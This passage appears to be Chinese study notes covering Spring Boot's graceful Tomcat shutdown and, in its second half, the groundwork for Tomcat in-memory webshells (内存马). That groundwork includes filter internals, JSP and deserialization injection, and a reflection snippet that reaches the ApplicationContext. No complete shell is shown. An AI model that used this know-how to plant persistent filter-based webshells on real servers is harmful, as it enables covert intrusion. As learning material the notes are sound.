break-all;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getBeanFactory</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">().</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">registerSingleton</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"webServerGracefulShutdown"</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">                    </span></span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">new</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">WebServerGracefulShutdownLifecycle</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">this</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">webServer</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">));</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getBeanFactory</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">().</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">registerSingleton</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"webServerStartStop"</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">                    </span></span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">new</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">WebServerStartStopLifecycle</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">this</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">this</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">webServer</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">));</span></span></span></p><p style=""><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="font-family:Cambria;">如果直接使用kill -9 方式暴力的将项目停掉，</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="font-family:Cambria;">大致需要解决如下问题：</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="font-family:Cambria;">首先要确保不会再有新的请求进来，所以需要设置一个流量挡板</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="font-family:Cambria;">保证正常处理已进来的请求线程，可以通过计数方式记录项目中的请求数量</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="font-family:Cambria;">如果涉及到注册中心，则需要在第一步结束后注销注册中心</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="font-family:Cambria;">停止项目中的定时任务</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="font-family:Cambria;">停止线程池</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="font-family:Cambria;">关闭其他需要关闭资源等等等</span></span></span></p><p style=""><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="font-family:Cambria;">Spring提供Tomcat优雅关闭的核心类是WebServerGracefulShutdownLifecycle</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">1.</span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="font-family:Cambria;">关闭Tomcat容器的所有的连接器，连接器关闭之后会停止接受新的请求。</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">2.</span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="font-family:Cambria;">轮询所有的Context容器，等待这些容器中的请求被处理完成。</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">3.</span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="font-family:Cambria;">如果强行退出，那么就不等待所有容器中的请求处理完成。</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">4.</span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="font-family:Cambria;">回调优雅关闭的结果，有三种关闭结果：REQUESTS_ACTIVE有活跃请求的情况下强行关闭，IDLE所有请求完成之后关闭，IMMEDIATE没有任何等待立即关闭容器。</span></span></span></p><p style=""><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="font-family:Cambria;">              </span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:springtomcat;"><span style="font-family:Cambria;">Spring容器在启动的时候会向JVM注册销毁回调方法，JVM在收到kill -15之后不会直接退出，而是会一一调用这些回调方法</span></span></span></p><p style=""><span style="mso-bookmark:内存马;"><span style="font-family:宋体;">内存马</span></span></p><p style=""><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Calibri;">tomcat调试</span></span></span></p><p style=""><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">调试进入tomcat（org.apache.catalina.core）需要将tomcat下lib文件夹内容加到项目lib库中</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;"></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">根据写的demo分别再init和dofilter打断点，可以看到filter初始化和访问时处理过程中涉及到的类和方法</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">              </span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;font-weight:bold;">不同内存马（tomcat、weblogic、jetty等）的区别在于不同中间件处理请求的流程和上下文context获取方式不同</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">利用jsp创建filter，request 和 response 是 jsp 的内置对象，所以在回显问题上不用考虑，利用反序列化注入内存马需要考虑回显问题</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">              </span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">对tomcat的filter结构理解大致如下</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;"></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;"></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;text-decoration:line-through;">自己画的图，属实有点丑</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">正好利用内存马获取参数值来复习反射用法</span></span></span></p><p style="mso-style-name: 'Source Code';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;word-break: break-all;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">ServletContext servletContext </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> request</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getSession</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">().</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getServletContext</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">();</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Field</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> appctx </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> servletContext</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getClass</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">().</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getDeclaredField</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"context"</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span>appctx</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">setAccessible</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">true</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span>ApplicationContext applicationContext </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">  </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">ApplicationContext</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">appctx</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">get</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">servletContext</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span></p><p style="mso-style-name: 'Source Code';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;word-break: break-all;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="">反射是一种在运行时动态获取和操作类、对象、方法和字段的能力。它允许程序在运行时检查和操作其自身的内部结构，而不需要提前知道这些结构的具体信息。</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="">在给定的代码片段中，使用了反射来获取应用程序的上下文对象。下面是对代码的解释：</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="">request.getSession().getServletContext()：通过HttpServletRequest对象获取到当前会话的ServletContext对象。ServletContext是一个Web应用程序的全局范围的对象，用于在应用程序的不同组件之间共享数据和资源。</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="">servletContext.getClass().getDeclaredField("context")：调用ServletContext对象的getClass()方法获取其对应的Class对象，然后使用getDeclaredField()方法获取名为"context"的字段。这里假设ServletContext类中有一个名为"context"的私有字段。</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="">appctx.setAccessible(true)：通过调用setAccessible(true)方法，将私有字段设置为可访问的，以便可以在后续步骤中获取它的值。</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="">appctx.get(servletContext)：调用get()方法，传入ServletContext对象，从中获取私有字段的值。这里假设"context"字段的类型为ApplicationContext。</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="">(ApplicationContext)appctx.get(servletContext)：将获取到的字段值强制转换为ApplicationContext类型，存储在变量applicationContext中。</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="">通过上述代码，使用反射技术获取了ServletContext对象中名为"context"的私有字段，并将其转换为ApplicationContext类型。这样就可以在代码中访问和使用该字段所代表的应用程序上下文对象。</span></span></span></p><p style="mso-style-name: 'Source Code';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;word-break: break-all;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="">在Java中，使用反射通过`get`方法获取字段的值需要遵循以下步骤：</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="">1. 获取要访问的字段所在的类的`Class`对象。可以使用对象的`getClass()`方法获取其对应的`Class`对象，或者使用`Class.forName()`方法通过类的全限定名获取`Class`对象。</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:tomcat调试;"><span style="font-family:Cambria;">              

